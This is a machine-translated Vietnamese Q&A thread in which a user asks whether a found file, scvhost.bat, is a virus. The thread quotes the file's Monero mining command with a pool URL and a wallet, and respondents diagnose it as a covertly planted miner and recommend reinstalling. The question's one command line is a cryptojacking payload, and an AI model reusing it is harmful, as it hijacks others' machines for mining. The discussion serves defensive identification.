Đây là scvhost.bat với cryptonight là virus hay công cụ khai thác?

17

Tôi vừa tìm thấy tập tin .bat này có tên là scvhost.bat. Các tập tin có nội dung này trong đó:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Đây có phải là vi-rút (để đánh cắp thông tin, v.v.) hoặc một công cụ khai thác không? Tôi lo lắng khi tôi cũng nghiên cứu về tiền điện tử và stratumlà loại tiền được đề cập trong tệp trên.

windows  batch-file  malware  cryptomining 
Lập trình viên mới
nguồn
1
Đây thực sự có vẻ là một thợ mỏ. Cho rằng bạn tự sử dụng tiền điện tử, nếu bạn cũng khai thác, hãy đảm bảo rằng đây không thực sự là một phần của bất cứ thứ gì bạn sử dụng để khai thác. Bạn có thể làm như vậy bằng cách đổi tên phần mở rộng .bat thành một cái khác và xem nếu bạn vẫn có thể khai thác bình thường sau khi khởi động lại. Một điều tôi thấy kỳ lạ về tập tin này là thông thường nó sẽ tự gọi mình là scvhost vừa là tên của những gì nó thực thi vừa là tập tin bat. Thông thường điều đó sẽ dẫn đến một vòng lặp.
LPChip
2
@VirtualAnomaly Tôi nghĩ rằng bạn đang nhầm sVChost với sCVhost được đề cập ở đây. Vâng, tôi biết rất nhiều rằng Svchost là cơ chế cho dịch vụ lưu trữ.
LPChip
2
@LPChip Lời xin lỗi của tôi, bạn nói đúng, tôi đã nhầm.
Bất thường ảo
2
Ai đó đã chơi quá nhiều Starcraft, tôi đoán vậy.
CodeInChaos
1
@lucidbrot SCV là đơn vị "người xây dựng" của một trong những chủng tộc của trò chơi, trong trường hợp đó là viết tắt của "Xe xây dựng không gian".
Aaron

Câu trả lời:

34

Đây dường như là một công cụ khai thác thuộc loại nào đó, đặc biệt là vì tham số chứa URL tới nhóm khai thác. Tuy nhiên, bạn cần chắc chắn những gì trong nhị phân. Sẽ là hợp lý khi so sánh tổng kiểm của nhị phân bạn tìm thấy trong hệ thống của mình với các bản phát hành được tạo bởi nhóm phát triển của người khai thác. Nếu chúng khác nhau; xem xét hệ thống của bạn không an toàn.

Một vấn đề khác là bạn đã phát hiện ra công cụ khai thác này (có thể vì nó đang sử dụng rất nhiều CPU), nhưng bạn không biết điều gì khác đã xảy ra trên hệ thống của mình. Nếu một kẻ xâm nhập có thể khởi chạy công cụ khai thác, thì chúng cũng có thể khởi chạy những thứ khác. Nó có thể là một ý tưởng tốt để phục hồi từ bản sao lưu hoặc thực hiện cài đặt mới.

mtak
nguồn
Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.